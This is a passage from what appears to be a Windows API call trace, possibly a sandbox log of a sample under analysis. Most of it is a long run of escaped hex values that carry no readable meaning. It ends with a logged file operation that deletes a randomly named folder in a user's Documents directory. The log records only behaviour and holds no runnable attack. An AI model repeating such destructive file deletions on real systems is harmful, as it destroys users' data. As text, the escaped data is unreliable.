x171\x1fed\xce83\xd0e6\x231\x54a\x5bf4\x146f\x813a\x743\x6808\x80a5\x17be\x5e83\xa1ce\x6f5d\xe870\x16a\x8ead\x741\x6872\x1bdb\xfa3c\x2f25\x1d17\x8e1e\x644c\x2ed0\xe871\x9166\x10d7\x5779\xf2c4\x517e\xd08e\xdfe7\xaf88\xcef7\x7418\x873f\x12ae\x47d0\x3404\x62f\x877d\xe743\x680a\x80b9\x888e\x5f41\xd0e5\xbd09\xb5ea\xa0c5\x704f\x5ba8\x5740\xe80a\xf967\x71b1\xd0e6\x104\x407d\x1b40\xd063\x393b\xfd94\x438b\x16ef\xbfd0\xa0c4\x1c85\x43ba\xa740\xe80b\x31a3\xf5e8\xfa1c\x809a\x4fa\x7174\xea0c\xd0e6\x4c7\x9274\x1680\xa0c6\x397d\x58b4\x5540\x1d01\x8313\x9776\x7421\x809a\xb66\x80e8\xf418\xe13\x46bd\xaf40\xd010\x9ae\xe851\xe4e\x281d\xc3a0\xb405\x62d\x937d\xbb43\xc9ff\x6ba3\xf027\x1df9\x9b12\x17df\xf439\x17d\xc3fd\x4e04\x4fb5\x7772\x889c\xccad\x351c\xa1f\xf98e\xb6\x42bd\x7710\x1b5e\x1279\xcf80\x81ec\xf703\x1745\xa183\x12ff\x47c5\xd812\x8830\xc32\xc297\x9a2f\x5202\x3761\x5728\xa822\xe14c\xc112\x6330\x36bc\x964f\xc0e4\x4d80\x63df\xda34\xc5ea\x7a9a\x8c6d\x69a7\xd4a1\x2ee0\xe960\xb7b\xad68\x71ea\xfde8\x5771\xc6a6\x8a49\x11b6\x7ba3\xc950\x9451\xe191\x5add\xa7e3\x5ade\x5d47\xfedc\x2e1a\xae82\xb85b\x58ee\xb47e\x1f90\xb51f\xa9bf\x446\xad7\x1e77\xd0c4\xec93\xd479\xbaaf\x5ba2\xbfda\x8dc1\x9b88\x6cac\x64f1\x5ede\x62a5\x2458\x8ee2\xbcc9\xa9c5\xf8c6\x16df\x1f71\x1b0f\xca00\x6c4d\x52b6\xc451\x65b7\x78ae\x9e1c\xd6ea\x7801\x27a2\xd764\x720f\x5055\x7a5\x2ed9\x6e82\x505b\xe57c\x3c16\x12b2\x8b1a\xa845\x58d5\x82c2\xd8e0\xe6a7\xefa3\x7bda\xda66\x7fe4\xc7a2\xead0\xa1cf\xc19a\xc050\x2822\x1e80\xddc4\x109b\x2ee1\x9565\x65a3\x67e1\x81d7\x39bb\xc826\xdd7b\x96e3\x62e4\x1b44\x67e1\xdf52\x5c82\xb9f3\x5007\xaa8a\x81f2\x6ee6\xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae") | out: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Zq0bBrnPbhA3GBBLi8", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x5